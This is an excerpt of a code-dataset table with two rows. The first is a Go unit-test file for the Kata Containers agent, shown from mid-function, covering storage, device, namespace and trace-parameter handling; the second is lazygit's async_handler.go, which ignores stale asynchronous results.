err = k.winsizeProcess(container, execid, 100, 200)
assert.Nil(err)
_, err = k.processListContainer(sandbox, Container{}, ProcessListOptions{})
assert.Nil(err)
err = k.updateContainer(sandbox, Container{}, specs.LinuxResources{})
assert.Nil(err)
err = k.pauseContainer(sandbox, Container{})
assert.Nil(err)
err = k.resumeContainer(sandbox, Container{})
assert.Nil(err)
err = k.onlineCPUMem(1, true)
assert.Nil(err)
_, err = k.statsContainer(sandbox, Container{})
assert.Nil(err)
err = k.check()
assert.Nil(err)
_, err = k.waitProcess(container, execid)
assert.Nil(err)
_, err = k.writeProcessStdin(container, execid, []byte{'c'})
assert.Nil(err)
err = k.closeProcessStdin(container, execid)
assert.Nil(err)
_, err = k.readProcessStdout(container, execid, []byte{})
assert.Nil(err)
_, err = k.readProcessStderr(container, execid, []byte{})
assert.Nil(err)
_, err = k.getOOMEvent()
assert.Nil(err)
}
func TestHandleEphemeralStorage(t *testing.T) {
k := kataAgent{}
var ociMounts []specs.Mount
mountSource := "/tmp/mountPoint"
mount := specs.Mount{
Type: KataEphemeralDevType,
Source: mountSource,
}
ociMounts = append(ociMounts, mount)
epheStorages := k.handleEphemeralStorage(ociMounts)
epheMountPoint := epheStorages[0].MountPoint
expected := filepath.Join(ephemeralPath(), filepath.Base(mountSource))
assert.Equal(t, epheMountPoint, expected,
"Ephemeral mount point didn't match: got %s, expecting %s", epheMountPoint, expected)
}
func TestHandleLocalStorage(t *testing.T) {
k := kataAgent{}
var ociMounts []specs.Mount
mountSource := "mountPoint"
mount := specs.Mount{
Type: KataLocalDevType,
Source: mountSource,
}
sandboxID := "sandboxid"
rootfsSuffix := "rootfs"
ociMounts = append(ociMounts, mount)
localStorages := k.handleLocalStorage(ociMounts, sandboxID, rootfsSuffix)
assert.NotNil(t, localStorages)
assert.Equal(t, len(localStorages), 1)
localMountPoint := localStorages[0].MountPoint
expected := filepath.Join(kataGuestSharedDir(), sandboxID, rootfsSuffix, KataLocalDevType, filepath.Base(mountSource))
assert.Equal(t, localMountPoint, expected)
}
func TestHandleDeviceBlockVolume(t *testing.T) {
k := kataAgent{}
tests := []struct {
BlockDeviceDriver string
inputDev *drivers.BlockDevice
resultVol *pb.Storage
}{
{
inputDev: &drivers.BlockDevice{
BlockDrive: &config.BlockDrive{
Pmem: true,
NvdimmID: testNvdimmID,
Format: testBlkDriveFormat,
},
},
resultVol: &pb.Storage{
Driver: kataNvdimmDevType,
Source: fmt.Sprintf("/dev/pmem%s", testNvdimmID),
Fstype: testBlkDriveFormat,
Options: []string{"dax"},
},
},
{
BlockDeviceDriver: config.VirtioBlockCCW,
inputDev: &drivers.BlockDevice{
BlockDrive: &config.BlockDrive{
DevNo: testDevNo,
},
},
resultVol: &pb.Storage{
Driver: kataBlkCCWDevType,
Source: testDevNo,
},
},
{
BlockDeviceDriver: config.VirtioBlock,
inputDev: &drivers.BlockDevice{
BlockDrive: &config.BlockDrive{
PCIAddr: testPCIAddr,
VirtPath: testVirtPath,
},
},
resultVol: &pb.Storage{
Driver: kataBlkDevType,
Source: testPCIAddr,
},
},
{
BlockDeviceDriver: config.VirtioBlock,
inputDev: &drivers.BlockDevice{
BlockDrive: &config.BlockDrive{
VirtPath: testVirtPath,
},
},
resultVol: &pb.Storage{
Driver: kataBlkDevType,
Source: testVirtPath,
},
},
{
BlockDeviceDriver: config.VirtioMmio,
inputDev: &drivers.BlockDevice{
BlockDrive: &config.BlockDrive{
VirtPath: testVirtPath,
},
},
resultVol: &pb.Storage{
Driver: kataMmioBlkDevType,
Source: testVirtPath,
},
},
{
BlockDeviceDriver: config.VirtioSCSI,
inputDev: &drivers.BlockDevice{
BlockDrive: &config.BlockDrive{
SCSIAddr: testSCSIAddr,
},
},
resultVol: &pb.Storage{
Driver: kataSCSIDevType,
Source: testSCSIAddr,
},
},
}
for _, test := range tests {
c := &Container{
sandbox: &Sandbox{
config: &SandboxConfig{
HypervisorConfig: HypervisorConfig{
BlockDeviceDriver: test.BlockDeviceDriver,
},
},
},
}
vol, _ := k.handleDeviceBlockVolume(c, test.inputDev)
assert.True(t, reflect.DeepEqual(vol, test.resultVol),
"Volume didn't match: got %+v, expecting %+v",
vol, test.resultVol)
}
}
func TestHandleBlockVolume(t *testing.T) {
k := kataAgent{}
c := &Container{
id: "100",
}
containers := map[string]*Container{}
containers[c.id] = c
// Create a VhostUserBlk device and a DeviceBlock device
vDevID := "MockVhostUserBlk"
bDevID := "MockDeviceBlock"
vDestination := "/VhostUserBlk/destination"
bDestination := "/DeviceBlock/destination"
vPCIAddr := "0001:01"
bPCIAddr := "0002:01"
vDev := drivers.NewVhostUserBlkDevice(&config.DeviceInfo{ID: vDevID})
bDev := drivers.NewBlockDevice(&config.DeviceInfo{ID: bDevID})
vDev.VhostUserDeviceAttrs = &config.VhostUserDeviceAttrs{PCIAddr: vPCIAddr}
bDev.BlockDrive = &config.BlockDrive{PCIAddr: bPCIAddr}
var devices []api.Device
devices = append(devices, vDev, bDev)
// Create a VhostUserBlk mount and a DeviceBlock mount
var mounts []Mount
vMount := Mount{
BlockDeviceID: vDevID,
Destination: vDestination,
}
bMount := Mount{
BlockDeviceID: bDevID,
Destination: bDestination,
}
mounts = append(mounts, vMount, bMount)
tmpDir := "/vhost/user/dir"
dm := manager.NewDeviceManager(manager.VirtioBlock, true, tmpDir, devices)
sConfig := SandboxConfig{}
sConfig.HypervisorConfig.BlockDeviceDriver = manager.VirtioBlock
sandbox := Sandbox{
id: "100",
containers: containers,
hypervisor: &mockHypervisor{},
devManager: dm,
ctx: context.Background(),
config: &sConfig,
}
containers[c.id].sandbox = &sandbox
containers[c.id].mounts = mounts
volumeStorages, err := k.handleBlockVolumes(c)
assert.Nil(t, err, "Error while handling block volumes")
vStorage := &pb.Storage{
MountPoint: vDestination,
Fstype: "bind",
Options: []string{"bind"},
Driver: kataBlkDevType,
Source: vPCIAddr,
}
bStorage := &pb.Storage{
MountPoint: bDestination,
Fstype: "bind",
Options: []string{"bind"},
Driver: kataBlkDevType,
Source: bPCIAddr,
}
assert.Equal(t, vStorage, volumeStorages[0], "Error while handle VhostUserBlk type block volume")
assert.Equal(t, bStorage, volumeStorages[1], "Error while handle BlockDevice type block volume")
}
func TestAppendDevicesEmptyContainerDeviceList(t *testing.T) {
k := kataAgent{}
devList := []*pb.Device{}
expected := []*pb.Device{}
ctrDevices := []ContainerDevice{}
c := &Container{
sandbox: &Sandbox{
devManager: manager.NewDeviceManager("virtio-scsi", false, "", nil),
},
devices: ctrDevices,
}
updatedDevList := k.appendDevices(devList, c)
assert.True(t, reflect.DeepEqual(updatedDevList, expected),
"Device lists didn't match: got %+v, expecting %+v",
updatedDevList, expected)
}
func TestAppendDevices(t *testing.T) {
k := kataAgent{}
id := "test-append-block"
ctrDevices := []api.Device{
&drivers.BlockDevice{
GenericDevice: &drivers.GenericDevice{
ID: id,
},
BlockDrive: &config.BlockDrive{
PCIAddr: testPCIAddr,
},
},
}
sandboxConfig := &SandboxConfig{
HypervisorConfig: HypervisorConfig{
BlockDeviceDriver: config.VirtioBlock,
},
}
c := &Container{
sandbox: &Sandbox{
devManager: manager.NewDeviceManager("virtio-blk", false, "", ctrDevices),
config: sandboxConfig,
},
}
c.devices = append(c.devices, ContainerDevice{
ID: id,
ContainerPath: testBlockDeviceCtrPath,
})
devList := []*pb.Device{}
expected := []*pb.Device{
{
Type: kataBlkDevType,
ContainerPath: testBlockDeviceCtrPath,
Id: testPCIAddr,
},
}
updatedDevList := k.appendDevices(devList, c)
assert.True(t, reflect.DeepEqual(updatedDevList, expected),
"Device lists didn't match: got %+v, expecting %+v",
updatedDevList, expected)
}
func TestAppendVhostUserBlkDevices(t *testing.T) {
k := kataAgent{}
id := "test-append-vhost-user-blk"
ctrDevices := []api.Device{
&drivers.VhostUserBlkDevice{
GenericDevice: &drivers.GenericDevice{
ID: id,
},
VhostUserDeviceAttrs: &config.VhostUserDeviceAttrs{
Type: config.VhostUserBlk,
PCIAddr: testPCIAddr,
},
},
}
sandboxConfig := &SandboxConfig{
HypervisorConfig: HypervisorConfig{
BlockDeviceDriver: config.VirtioBlock,
},
}
testVhostUserStorePath := "/test/vhost/user/store/path"
c := &Container{
sandbox: &Sandbox{
devManager: manager.NewDeviceManager("virtio-blk", true, testVhostUserStorePath, ctrDevices),
config: sandboxConfig,
},
}
c.devices = append(c.devices, ContainerDevice{
ID: id,
ContainerPath: testBlockDeviceCtrPath,
})
devList := []*pb.Device{}
expected := []*pb.Device{
{
Type: kataBlkDevType,
ContainerPath: testBlockDeviceCtrPath,
Id: testPCIAddr,
},
}
updatedDevList := k.appendDevices(devList, c)
assert.True(t, reflect.DeepEqual(updatedDevList, expected),
"Device lists didn't match: got %+v, expecting %+v",
updatedDevList, expected)
}
func TestConstraintGRPCSpec(t *testing.T) {
assert := assert.New(t)
expectedCgroupPath := "/foo/bar"
g := &pb.Spec{
Hooks: &pb.Hooks{},
Mounts: []pb.Mount{
{Destination: "/dev/shm"},
},
Linux: &pb.Linux{
Seccomp: &pb.LinuxSeccomp{},
Namespaces: []pb.LinuxNamespace{
{
Type: specs.NetworkNamespace,
Path: "/abc/123",
},
{
Type: specs.MountNamespace,
Path: "/abc/123",
},
},
Resources: &pb.LinuxResources{
Devices: []pb.LinuxDeviceCgroup{},
Memory: &pb.LinuxMemory{},
CPU: &pb.LinuxCPU{},
Pids: &pb.LinuxPids{},
BlockIO: &pb.LinuxBlockIO{},
HugepageLimits: []pb.LinuxHugepageLimit{},
Network: &pb.LinuxNetwork{},
},
CgroupsPath: "system.slice:foo:bar",
Devices: []pb.LinuxDevice{
{
Path: "/dev/vfio/1",
Type: "c",
},
{
Path: "/dev/vfio/2",
Type: "c",
},
},
},
Process: &pb.Process{
SelinuxLabel: "foo",
},
}
k := kataAgent{}
k.constraintGRPCSpec(g, true)
// check nil fields
assert.Nil(g.Hooks)
assert.NotNil(g.Linux.Seccomp)
assert.Nil(g.Linux.Resources.Devices)
assert.NotNil(g.Linux.Resources.Memory)
assert.Nil(g.Linux.Resources.Pids)
assert.Nil(g.Linux.Resources.BlockIO)
assert.Nil(g.Linux.Resources.HugepageLimits)
assert.Nil(g.Linux.Resources.Network)
assert.NotNil(g.Linux.Resources.CPU)
assert.Equal(g.Process.SelinuxLabel, "")
// check namespaces
assert.Len(g.Linux.Namespaces, 1)
assert.Empty(g.Linux.Namespaces[0].Path)
// check mounts
assert.Len(g.Mounts, 1)
// check cgroup path
assert.Equal(expectedCgroupPath, g.Linux.CgroupsPath)
// check Linux devices
assert.Empty(g.Linux.Devices)
}
func TestHandleShm(t *testing.T) {
assert := assert.New(t)
k := kataAgent{}
sandbox := &Sandbox{
shmSize: 8192,
}
var ociMounts []specs.Mount
mount := specs.Mount{
Type: "bind",
Destination: "/dev/shm",
}
ociMounts = append(ociMounts, mount)
k.handleShm(ociMounts, sandbox)
assert.Len(ociMounts, 1)
assert.NotEmpty(ociMounts[0].Destination)
assert.Equal(ociMounts[0].Destination, "/dev/shm")
assert.Equal(ociMounts[0].Type, "bind")
assert.NotEmpty(ociMounts[0].Source, filepath.Join(kataGuestSharedDir(), shmDir))
assert.Equal(ociMounts[0].Options, []string{"rbind"})
sandbox.shmSize = 0
k.handleShm(ociMounts, sandbox)
assert.Len(ociMounts, 1)
assert.Equal(ociMounts[0].Destination, "/dev/shm")
assert.Equal(ociMounts[0].Type, "tmpfs")
assert.Equal(ociMounts[0].Source, "shm")
sizeOption := fmt.Sprintf("size=%d", DefaultShmSize)
assert.Equal(ociMounts[0].Options, []string{"noexec", "nosuid", "nodev", "mode=1777", sizeOption})
// In case the type of mount is ephemeral, the container mount is not
// shared with the sandbox shm.
ociMounts[0].Type = KataEphemeralDevType
mountSource := "/tmp/mountPoint"
ociMounts[0].Source = mountSource
k.handleShm(ociMounts, sandbox)
assert.Len(ociMounts, 1)
assert.Equal(ociMounts[0].Type, KataEphemeralDevType)
assert.NotEmpty(ociMounts[0].Source, mountSource)
epheStorages := k.handleEphemeralStorage(ociMounts)
epheMountPoint := epheStorages[0].MountPoint
expected := filepath.Join(ephemeralPath(), filepath.Base(mountSource))
assert.Equal(epheMountPoint, expected,
"Ephemeral mount point didn't match: got %s, expecting %s", epheMountPoint, expected)
}
func testIsPidNamespacePresent(grpcSpec *pb.Spec) bool {
for _, ns := range grpcSpec.Linux.Namespaces {
if ns.Type == string(specs.PIDNamespace) {
return true
}
}
return false
}
func TestHandlePidNamespace(t *testing.T) {
assert := assert.New(t)
g := &pb.Spec{
Linux: &pb.Linux{
Namespaces: []pb.LinuxNamespace{
{
Type: specs.NetworkNamespace,
Path: "/abc/123",
},
{
Type: specs.MountNamespace,
Path: "/abc/123",
},
},
},
}
sandbox := &Sandbox{}
k := kataAgent{}
sharedPid := k.handlePidNamespace(g, sandbox)
assert.False(sharedPid)
assert.False(testIsPidNamespacePresent(g))
pidNs := pb.LinuxNamespace{
Type: string(specs.PIDNamespace),
Path: "",
}
utsNs := pb.LinuxNamespace{
Type: specs.UTSNamespace,
Path: "",
}
g.Linux.Namespaces = append(g.Linux.Namespaces, pidNs)
g.Linux.Namespaces = append(g.Linux.Namespaces, utsNs)
sharedPid = k.handlePidNamespace(g, sandbox)
assert.False(sharedPid)
assert.False(testIsPidNamespacePresent(g))
pidNs = pb.LinuxNamespace{
Type: string(specs.PIDNamespace),
Path: "/proc/112/ns/pid",
}
g.Linux.Namespaces = append(g.Linux.Namespaces, pidNs)
sharedPid = k.handlePidNamespace(g, sandbox)
assert.True(sharedPid)
assert.False(testIsPidNamespacePresent(g))
}
func TestAgentConfigure(t *testing.T) {
assert := assert.New(t)
dir, err := ioutil.TempDir("", "kata-agent-test")
assert.Nil(err)
defer os.RemoveAll(dir)
k := &kataAgent{}
h := &mockHypervisor{}
c := KataAgentConfig{}
id := "foobar"
err = k.configure(h, id, dir, true, c)
assert.Nil(err)
err = k.configure(h, id, dir, true, c)
assert.Nil(err)
assert.Empty(k.state.URL)
err = k.configure(h, id, dir, false, c)
assert.Nil(err)
}
func TestCmdToKataProcess(t *testing.T) {
assert := assert.New(t)
cmd := types.Cmd{
Args: strings.Split("foo", " "),
Envs: []types.EnvVar{},
WorkDir: "/",
User: "1000",
PrimaryGroup: "1000",
}
_, err := cmdToKataProcess(cmd)
assert.Nil(err)
cmd1 := cmd
cmd1.User = "foobar"
_, err = cmdToKataProcess(cmd1)
assert.Error(err)
cmd1 = cmd
cmd1.PrimaryGroup = "foobar"
_, err = cmdToKataProcess(cmd1)
assert.Error(err)
cmd1 = cmd
cmd1.User = "foobar:1000"
_, err = cmdToKataProcess(cmd1)
assert.Error(err)
cmd1 = cmd
cmd1.User = "1000:2000"
_, err = cmdToKataProcess(cmd1)
assert.Nil(err)
cmd1 = cmd
cmd1.SupplementaryGroups = []string{"foo"}
_, err = cmdToKataProcess(cmd1)
assert.Error(err)
cmd1 = cmd
cmd1.SupplementaryGroups = []string{"4000"}
_, err = cmdToKataProcess(cmd1)
assert.Nil(err)
}
func TestAgentCreateContainer(t *testing.T) {
assert := assert.New(t)
sandbox := &Sandbox{
ctx: context.Background(),
id: "foobar",
config: &SandboxConfig{
ID: "foobar",
HypervisorType: MockHypervisor,
HypervisorConfig: HypervisorConfig{
KernelPath: "foo",
ImagePath: "bar",
},
},
hypervisor: &mockHypervisor{},
}
newStore, err := persist.GetDriver()
assert.NoError(err)
assert.NotNil(newStore)
sandbox.newStore = newStore
container := &Container{
ctx: sandbox.ctx,
id: "barfoo",
sandboxID: "foobar",
sandbox: sandbox,
state: types.ContainerState{
Fstype: "xfs",
},
config: &ContainerConfig{
CustomSpec: &specs.Spec{},
Annotations: map[string]string{},
},
}
impl := &gRPCProxy{}
proxy := mock.ProxyGRPCMock{
GRPCImplementer: impl,
GRPCRegister: gRPCRegister,
}
sockDir, err := testGenerateKataProxySockDir()
assert.Nil(err)
defer os.RemoveAll(sockDir)
testKataProxyURL := fmt.Sprintf(testKataProxyURLTempl, sockDir)
err = proxy.Start(testKataProxyURL)
assert.Nil(err)
defer proxy.Stop()
k := &kataAgent{
ctx: context.Background(),
state: KataAgentState{
URL: testKataProxyURL,
},
}
dir, err := ioutil.TempDir("", "kata-agent-test")
assert.Nil(err)
defer os.RemoveAll(dir)
err = k.configure(&mockHypervisor{}, sandbox.id, dir, true, KataAgentConfig{})
assert.Nil(err)
// We'll fail on container metadata file creation, but it helps increasing coverage...
_, err = k.createContainer(sandbox, container)
assert.Error(err)
}
func TestAgentNetworkOperation(t *testing.T) {
assert := assert.New(t)
impl := &gRPCProxy{}
proxy := mock.ProxyGRPCMock{
GRPCImplementer: impl,
GRPCRegister: gRPCRegister,
}
sockDir, err := testGenerateKataProxySockDir()
assert.NoError(err)
defer os.RemoveAll(sockDir)
testKataProxyURL := fmt.Sprintf(testKataProxyURLTempl, sockDir)
assert.NoError(proxy.Start(testKataProxyURL))
defer proxy.Stop()
k := &kataAgent{
ctx: context.Background(),
state: KataAgentState{
URL: testKataProxyURL,
},
}
_, err = k.updateInterface(nil)
assert.Nil(err)
_, err = k.listInterfaces()
assert.Nil(err)
_, err = k.updateRoutes([]*vcTypes.Route{})
assert.Nil(err)
_, err = k.listRoutes()
assert.Nil(err)
}
func TestKataAgentSetProxy(t *testing.T) {
assert := assert.New(t)
k := &kataAgent{ctx: context.Background()}
p := &kataBuiltInProxy{}
s := &Sandbox{
ctx: context.Background(),
id: "foobar",
}
err := k.setProxy(s, p, 0, "")
assert.Error(err)
}
func TestKataGetAgentUrl(t *testing.T) {
assert := assert.New(t)
var err error
k := &kataAgent{vmSocket: types.Socket{HostPath: "/abc"}}
assert.NoError(err)
url, err := k.getAgentURL()
assert.Nil(err)
assert.NotEmpty(url)
k.vmSocket = types.VSock{}
assert.NoError(err)
url, err = k.getAgentURL()
assert.Nil(err)
assert.NotEmpty(url)
}
func TestKataCopyFile(t *testing.T) {
assert := assert.New(t)
impl := &gRPCProxy{}
proxy := mock.ProxyGRPCMock{
GRPCImplementer: impl,
GRPCRegister: gRPCRegister,
}
sockDir, err := testGenerateKataProxySockDir()
assert.NoError(err)
defer os.RemoveAll(sockDir)
testKataProxyURL := fmt.Sprintf(testKataProxyURLTempl, sockDir)
err = proxy.Start(testKataProxyURL)
assert.NoError(err)
defer proxy.Stop()
k := &kataAgent{
ctx: context.Background(),
state: KataAgentState{
URL: testKataProxyURL,
},
}
err = k.copyFile("/abc/xyz/123", "/tmp")
assert.Error(err)
src, err := ioutil.TempFile("", "src")
assert.NoError(err)
defer os.Remove(src.Name())
data := []byte("abcdefghi123456789")
_, err = src.Write(data)
assert.NoError(err)
assert.NoError(src.Close())
dst, err := ioutil.TempFile("", "dst")
assert.NoError(err)
assert.NoError(dst.Close())
defer os.Remove(dst.Name())
orgGrpcMaxDataSize := grpcMaxDataSize
grpcMaxDataSize = 1
defer func() {
grpcMaxDataSize = orgGrpcMaxDataSize
}()
err = k.copyFile(src.Name(), dst.Name())
assert.NoError(err)
}
func TestKataCleanupSandbox(t *testing.T) {
assert := assert.New(t)
kataHostSharedDirSaved := kataHostSharedDir
kataHostSharedDir = func() string {
td, _ := ioutil.TempDir("", "kata-cleanup")
return td
}
defer func() {
kataHostSharedDir = kataHostSharedDirSaved
}()
s := Sandbox{
id: "testFoo",
}
dir := kataHostSharedDir()
defer os.RemoveAll(dir)
err := os.MkdirAll(path.Join(dir, s.id), 0777)
assert.Nil(err)
k := &kataAgent{ctx: context.Background()}
k.cleanup(&s)
_, err = os.Stat(dir)
assert.False(os.IsExist(err))
}
func TestKataAgentKernelParams(t *testing.T) {
assert := assert.New(t)
type testData struct {
debug bool
trace bool
containerPipeSize uint32
traceMode string
traceType string
expectedParams []Param
}
debugParam := Param{Key: "agent.log", Value: "debug"}
traceIsolatedParam := Param{Key: "agent.trace", Value: "isolated"}
traceCollatedParam := Param{Key: "agent.trace", Value: "collated"}
traceFooParam := Param{Key: "agent.trace", Value: "foo"}
containerPipeSizeParam := Param{Key: vcAnnotations.ContainerPipeSizeKernelParam, Value: "2097152"}
data := []testData{
{false, false, 0, "", "", []Param{}},
{true, false, 0, "", "", []Param{debugParam}},
{false, false, 0, "foo", "", []Param{}},
{false, false, 0, "foo", "", []Param{}},
{false, false, 0, "", "foo", []Param{}},
{false, false, 0, "", "foo", []Param{}},
{false, false, 0, "foo", "foo", []Param{}},
{false, true, 0, "foo", "foo", []Param{}},
{false, false, 0, agentTraceModeDynamic, "", []Param{}},
{false, false, 0, agentTraceModeStatic, "", []Param{}},
{false, false, 0, "", agentTraceTypeIsolated, []Param{}},
{false, false, 0, "", agentTraceTypeCollated, []Param{}},
{false, false, 0, "foo", agentTraceTypeIsolated, []Param{}},
{false, false, 0, "foo", agentTraceTypeCollated, []Param{}},
{false, false, 0, agentTraceModeDynamic, agentTraceTypeIsolated, []Param{}},
{false, false, 0, agentTraceModeDynamic, agentTraceTypeCollated, []Param{}},
{false, false, 0, agentTraceModeStatic, agentTraceTypeCollated, []Param{}},
{false, false, 0, agentTraceModeStatic, agentTraceTypeCollated, []Param{}},
{false, true, 0, agentTraceModeDynamic, agentTraceTypeIsolated, []Param{}},
{false, true, 0, agentTraceModeDynamic, agentTraceTypeCollated, []Param{}},
{true, true, 0, agentTraceModeDynamic, agentTraceTypeCollated, []Param{debugParam}},
{false, true, 0, "", agentTraceTypeIsolated, []Param{}},
{false, true, 0, "", agentTraceTypeCollated, []Param{}},
{true, true, 0, "", agentTraceTypeIsolated, []Param{debugParam}},
{true, true, 0, "", agentTraceTypeCollated, []Param{debugParam}},
{false, true, 0, "foo", agentTraceTypeIsolated, []Param{}},
{false, true, 0, "foo", agentTraceTypeCollated, []Param{}},
{true, true, 0, "foo", agentTraceTypeIsolated, []Param{debugParam}},
{true, true, 0, "foo", agentTraceTypeCollated, []Param{debugParam}},
{false, true, 0, agentTraceModeStatic, agentTraceTypeIsolated, []Param{traceIsolatedParam}},
{false, true, 0, agentTraceModeStatic, agentTraceTypeCollated, []Param{traceCollatedParam}},
{true, true, 0, agentTraceModeStatic, agentTraceTypeIsolated, []Param{traceIsolatedParam, debugParam}},
{true, true, 0, agentTraceModeStatic, agentTraceTypeCollated, []Param{traceCollatedParam, debugParam}},
{false, true, 0, agentTraceModeStatic, "foo", []Param{traceFooParam}},
{true, true, 0, agentTraceModeStatic, "foo", []Param{debugParam, traceFooParam}},
{false, false, 0, "", "", []Param{}},
{false, false, 2097152, "", "", []Param{containerPipeSizeParam}},
}
for i, d := range data {
config := KataAgentConfig{
Debug: d.debug,
Trace: d.trace,
TraceMode: d.traceMode,
TraceType: d.traceType,
ContainerPipeSize: d.containerPipeSize,
}
count := len(d.expectedParams)
params := KataAgentKernelParams(config)
if count == 0 {
assert.Emptyf(params, "test %d (%+v)", i, d)
continue
}
assert.Len(params, count)
for _, p := range d.expectedParams {
assert.Containsf(params, p, "test %d (%+v)", i, d)
}
}
}
func TestKataAgentHandleTraceSettings(t *testing.T) {
assert := assert.New(t)
type testData struct {
traceMode string
trace bool
expectDisableVMShutdown bool
expectDynamicTracing bool
}
data := []testData{
{"", false, false, false},
{"", true, false, false},
{agentTraceModeStatic, true, true, false},
{agentTraceModeDynamic, true, false, true},
}
for i, d := range data {
k := &kataAgent{}
config := KataAgentConfig{
Trace: d.trace,
TraceMode: d.traceMode,
}
disableVMShutdown := k.handleTraceSettings(config)
if d.expectDisableVMShutdown {
assert.Truef(disableVMShutdown, "test %d (%+v)", i, d)
} else {
assert.Falsef(disableVMShutdown, "test %d (%+v)", i, d)
}
if d.expectDynamicTracing {
assert.Truef(k.dynamicTracing, "test %d (%+v)", i, d)
} else {
assert.Falsef(k.dynamicTracing, "test %d (%+v)", i, d)
}
}
}
func TestKataAgentSetDefaultTraceConfigOptions(t *testing.T) {
assert := assert.New(t)
type testData struct {
traceMode string
traceType string
trace bool
expectDefaultTraceMode bool
expectDefaultTraceType bool
expectError bool
}
data := []testData{
{"", "", false, false, false, false},
{agentTraceModeDynamic, agentTraceTypeCollated, false, false, false, false},
{agentTraceModeDynamic, agentTraceTypeIsolated, false, false, false, false},
{agentTraceModeStatic, agentTraceTypeCollated, false, false, false, false},
{agentTraceModeStatic, agentTraceTypeIsolated, false, false, false, false},
{agentTraceModeDynamic, agentTraceTypeCollated, true, false, false, false},
{agentTraceModeDynamic, agentTraceTypeIsolated, true, false, false, false},
{agentTraceModeStatic, agentTraceTypeCollated, true, false, false, false},
{agentTraceModeStatic, agentTraceTypeIsolated, true, false, false, false},
{agentTraceModeDynamic, "", true, false, true, false},
{agentTraceModeDynamic, "invalid", true, false, false, true},
{agentTraceModeStatic, "", true, false, true, false},
{agentTraceModeStatic, "invalid", true, false, false, true},
{"", agentTraceTypeIsolated, true, true, false, false},
{"invalid", agentTraceTypeIsolated, true, false, false, true},
{"", agentTraceTypeCollated, true, true, false, false},
{"invalid", agentTraceTypeCollated, true, false, false, true},
{"", "", true, true, true, false},
{"invalid", "invalid", true, false, false, true},
}
for i, d := range data {
config := &KataAgentConfig{
Trace: d.trace,
TraceMode: d.traceMode,
TraceType: d.traceType,
}
err := KataAgentSetDefaultTraceConfigOptions(config)
if d.expectError {
assert.Error(err, "test %d (%+v)", i, d)
continue
} else {
assert.NoError(err, "test %d (%+v)", i, d)
}
if d.expectDefaultTraceMode {
assert.Equalf(config.TraceMode, defaultAgentTraceMode, "test %d (%+v)", i, d)
}
if d.expectDefaultTraceType {
assert.Equalf(config.TraceType, defaultAgentTraceType, "test %d (%+v)", i, d)
}
}
}
func TestKataAgentDirs(t *testing.T) {
assert := assert.New(t)
uidmapFile, err := os.OpenFile("/proc/self/uid_map", os.O_RDONLY, 0)
assert.NoError(err)
line, err := bufio.NewReader(uidmapFile).ReadBytes('\n')
assert.NoError(err)
uidmap := strings.Fields(string(line))
expectedRootless := (uidmap[0] == "0" && uidmap[1] != "0")
assert.Equal(expectedRootless, rootless.IsRootless())
if expectedRootless {
assert.Equal(kataHostSharedDir(), os.Getenv("XDG_RUNTIME_DIR")+defaultKataHostSharedDir)
assert.Equal(kataGuestSharedDir(), os.Getenv("XDG_RUNTIME_DIR")+defaultKataGuestSharedDir)
assert.Equal(kataGuestSandboxDir(), os.Getenv("XDG_RUNTIME_DIR")+defaultKataGuestSandboxDir)
assert.Equal(ephemeralPath(), os.Getenv("XDG_RUNTIME_DIR")+defaultEphemeralPath)
} else {
assert.Equal(kataHostSharedDir(), defaultKataHostSharedDir)
assert.Equal(kataGuestSharedDir(), defaultKataGuestSharedDir)
assert.Equal(kataGuestSandboxDir(), defaultKataGuestSandboxDir)
assert.Equal(ephemeralPath(), defaultEphemeralPath)
}
}
| [
"\"XDG_RUNTIME_DIR\"",
"\"XDG_RUNTIME_DIR\"",
"\"XDG_RUNTIME_DIR\"",
"\"XDG_RUNTIME_DIR\""
]
| []
| [
"XDG_RUNTIME_DIR"
]
| [] | ["XDG_RUNTIME_DIR"] | go | 1 | 0 | |
pkg/tasks/async_handler.go | package tasks
import (
"sync"
"github.com/Jeffthedoor/lazygit/pkg/utils"
)
// the purpose of an AsyncHandler is to ensure that if we have multiple long-running
// requests, we only handle the result of the latest one. For example, if I am
// searching for 'abc' and I have to type 'a' then 'b' then 'c' and each keypress
// dispatches a request to search for things with the string so-far, we'll be searching
// for 'a', 'ab', and 'abc', and it may be that 'abc' comes back first, then 'ab',
// then 'a' and we don't want to display the result for 'a' just because it came
// back last. AsyncHandler keeps track of the order in which things were dispatched
// so that we can ignore anything that comes back late.
type AsyncHandler struct {
currentId int
lastId int
mutex sync.Mutex
onReject func()
}
func NewAsyncHandler() *AsyncHandler {
return &AsyncHandler{
mutex: sync.Mutex{},
}
}
func (self *AsyncHandler) Do(f func() func()) {
self.mutex.Lock()
self.currentId++
id := self.currentId
self.mutex.Unlock()
go utils.Safe(func() {
after := f()
self.handle(after, id)
})
}
// f here is expected to be a function that doesn't take long to run
func (self *AsyncHandler) handle(f func(), id int) {
self.mutex.Lock()
defer self.mutex.Unlock()
if id < self.lastId {
if self.onReject != nil {
self.onReject()
}
return
}
self.lastId = id
f()
}
| []
| []
| []
| [] | [] | go | null | null | null |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.